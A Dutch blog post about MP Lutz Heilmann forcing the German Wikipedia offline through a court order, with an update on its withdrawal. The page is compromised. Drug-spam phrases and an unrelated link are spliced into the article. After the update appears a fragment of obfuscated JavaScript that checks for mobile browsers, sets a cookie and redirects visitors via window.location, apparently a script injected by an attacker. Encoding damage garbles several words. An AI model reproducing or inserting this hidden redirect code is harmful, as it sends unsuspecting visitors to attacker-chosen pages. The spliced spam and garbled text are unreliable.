Duitsland moet weer aan de Winkler Prins

Carbozyne shipping Zware tijden voor het vrije woord. Bezoekers van de Duitstalige versie van Wikipedia kunnen sinds gisteren geen gebruik meer maken van de gratis online encyclopedie. De Duitse parlementariAi??r Lutz Heilmann heeft dat middels een kort geding voor elkaar gekregen.

http://jockeyclubdesorocaba.com.br/?p=34829 Op de Wikipedia-pagina over Heilmann was te lezen dat de beste man ten tijde van het DDR-regime werkte voor de geheime dienst. Nu heeft iedereen jeugdzonden, maar Lutz probeerde volgens Wikipedia zijn verleden te verbergen. Hierop besloot hij een kort geding tegen Wikipedia aan te spannen, en wonder boven wonder stelde de rechter hem in het gelijk.

Het mooie aan dit verhaal is natuurlijk dat Heilmann het direct tegenovergestelde van wat hij wilde heeft bereikt. Sinds de Duitse Wikipedia op zwart ging is het aantal bezoeken aan zijn Engelstalige pagina enorm gestegen. Het verleden dat hij zo hard probeert te verbergen is door deze niet al te slimme actie nu ook ver buiten Duitsland bekend. Het Engels kent hier een mooie term voor: Buy cozaar cheap backfire.

Advocaten van Wikipedia reageren terecht verbaasd op de uitspraak. Het is Ai??Ai??n ding om een bepaalde pagina te verbieden, maar het dichtgooien van de complete Duitse website is compleet buiten proporties. Hoe lang de sluiting gaat duren is nog niet bekend, maar het mag duidelijk zijn dat het vrije woord door deze kwestie ernstige schade is toegedaan. De Ridders spreken zich hierbij dan ook uit tegen deze schandalige gang van zaken.

[Update] Herr Heilmann hat erklAi??rt, er wA?rde die einstweilige VerfA?gung zurA?ckziehen. Sobald die VerfA?gung aufgehoben ist, werden wir unser Suchangebot wiederherstellen.

Zo is te lezen op de Duitse Wikipedia homepage. De heer Heilmann heeft zijn fouten ingezien, het ziet ernaar uit dat het vrije woord zegeviert. Laat dit een les zijn. )|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

Een reactie op “Duitsland moet weer aan de Winkler Prins”

  1. [...] Duitsland-redactie heeft het er maar druk mee vandaag. Eerst gedonder rondom een oud Stasi-menneke dat de aloude DDR-censuur op het internet probeert los te laten en nu weer een veel te goede Duitse [...]

Laat een bericht achter